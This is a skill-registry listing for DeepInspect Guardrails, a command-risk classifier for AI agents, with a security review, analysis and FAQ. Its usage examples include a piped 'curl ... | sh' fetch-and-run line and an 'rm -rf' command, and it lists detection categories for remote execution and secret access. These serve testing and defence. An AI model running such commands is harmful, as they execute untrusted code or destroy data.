DeepInspect Guardrails
Author: parmindersk · v1.0.0
Total downloads: 584 · Favorites: 0 · Current installs: 0 · Versions: 1
Install in OpenClaw
/install deepinspect-openclaw-guardrails
Description
Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.
Usage (SKILL.md)
OpenClaw Guardrails (MVP)
DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.
What it does (MVP)
- Classifies requested command risk
- Returns allow, require_approval, or block
- Emits reason codes for explainability
- Uses a baseline balanced profile in policy.baseline.json
Decision outputs
- allow
- require_approval
- block
Reason codes (examples)
- REMOTE_EXEC_PATTERN
- DESTRUCTIVE_PATTERN
- PRIVILEGE_ESCALATION_PATTERN
- SYSTEM_MUTATION_PATTERN
- SECRET_ACCESS_PATTERN
- OUTSIDE_WORKSPACE_PATH
Local usage
node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"
Run tests
node skills/openclaw/guardrails/tests/decide.test.js
How to tune policy
Edit the following keys in policy.baseline.json:
- workspaceRoots
- allowlistedDomains
- highRiskPatterns
- actions
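The sketch below is an added example, not the skill's src/decide.js: it shows how a deterministic preflight check can combine pattern matches with a workspace-root test and return the strictest action plus reason codes. Only the key names and reason codes come from this page; the regexes, the /home/dev/project root, the shape of each entry and the action mapping are assumptions, so the decisions reflect this constructed policy rather than policy.baseline.json.

```javascript
// Added illustration, not the skill's own code. Key names and reason codes are
// from the page; all values and the entry layout are assumed for the example.
const policy = {
  workspaceRoots: ["/home/dev/project"], // constructed root
  highRiskPatterns: [
    { code: "REMOTE_EXEC_PATTERN", re: /\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b/ },
    { code: "DESTRUCTIVE_PATTERN", re: /\brm\s+-\w*(r\w*f|f\w*r)/ },
    { code: "PRIVILEGE_ESCALATION_PATTERN", re: /(^|[;&|]\s*)sudo\b/ },
    { code: "SECRET_ACCESS_PATTERN", re: /(^|[\s\/])\.ssh\b|\.env\b/ },
  ],
  actions: {
    REMOTE_EXEC_PATTERN: "block",
    DESTRUCTIVE_PATTERN: "require_approval",
    PRIVILEGE_ESCALATION_PATTERN: "require_approval",
    SECRET_ACCESS_PATTERN: "require_approval",
    OUTSIDE_WORKSPACE_PATH: "require_approval",
  },
};
const RANK = { allow: 0, require_approval: 1, block: 2 };

// Resolve "." and ".." lexically so a path is judged by where it lands.
function normalize(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "..") out.pop();
    else if (seg && seg !== ".") out.push(seg);
  }
  return "/" + out.join("/");
}

// Compare on a path boundary so /home/dev/project-other is not treated as inside.
function insideWorkspace(p, roots) {
  const n = normalize(p);
  return roots.some((r) => n === r || n.startsWith(r + "/"));
}

function decide(command, pol = policy) {
  const reasons = pol.highRiskPatterns
    .filter(({ re }) => re.test(command))
    .map(({ code }) => code);
  // Absolute-path tokens only; relative paths are assumed to stay in the workspace.
  const paths = command.split(/\s+/).filter((t) => t.startsWith("/"));
  if (paths.some((p) => !insideWorkspace(p, pol.workspaceRoots)))
    reasons.push("OUTSIDE_WORKSPACE_PATH");
  // The strictest action among matched reasons wins; no match means allow.
  const decision = reasons.reduce(
    (d, c) => (RANK[pol.actions[c]] > RANK[d] ? pol.actions[c] : d), "allow");
  return { decision, reasons };
}
```

With a workspaceRoots value that does not match the real project directory, every absolute path in the project would trip OUTSIDE_WORKSPACE_PATH, which is why that key needs tuning before the reason code carries any signal.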
Security usage recommendations
This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.
Functional analysis
Type: OpenClaw Skill
Name: deepinspect-openclaw-guardrails
Version: 1.0.0
This skill bundle implements a security guardrail system designed to classify command-like actions based on predefined risk patterns. The code in `src/decide.js` and `policy.baseline.json` explicitly looks for indicators of malicious behavior (e.g., remote execution, destructive commands, privilege escalation, secret access, sensitive path access) to block or require approval for such actions. The `SKILL.md` documentation accurately describes this purpose and provides examples for testing the guardrail's detection capabilities, not for the agent to execute maliciously. There is no evidence of data exfiltration, malicious execution, persistence mechanisms, or prompt injection attempts against the agent; rather, the skill aims to prevent these very actions.
Capability assessment
Purpose & Capability
The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).
Instruction Scope
SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.
Install Mechanism
No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.
Credentials
The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.
Persistence & Privilege
The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.
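How to use
- Make sure OpenClaw is installed (local or Docker deployment)
- Enter the install command in the chat box: /install deepinspect-openclaw-guardrails
- After installation, call the Skill by name or use /deepinspect-openclaw-guardrails to trigger it
- Provide the required input according to the Skill's parameter description to get structured output
Version history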
v1.0.0
Initial release of OpenClaw Guardrails:
- Provides deterministic risk classification for command-like actions: allow, require_approval, or block.
- Emits reason codes for explainability (e.g., REMOTE_EXEC_PATTERN, DESTRUCTIVE_PATTERN).
- Uses a baseline policy profile (policy.baseline.json) for decisions.
- Includes local CLI for testing command classifications.
- Supports policy tuning via editable JSON settings.
FAQ
What is DeepInspect Guardrails?
Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes. It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 584 cumulative downloads to date.
How do I install DeepInspect Guardrails?
Run the command "/install deepinspect-openclaw-guardrails" in the OpenClaw or Claude Code chat box to install it in one step, with no additional configuration.
Is DeepInspect Guardrails free?
Yes, DeepInspect Guardrails is completely free (free and open source) and can be freely downloaded, installed, and used.
Which platforms does DeepInspect Guardrails support?
DeepInspect Guardrails runs cross-platform and can be used in any environment where OpenClaw / Claude Code is deployed.
Who developed DeepInspect Guardrails?
It is developed and maintained by parmindersk (@parmindersk); the current version is v1.0.0.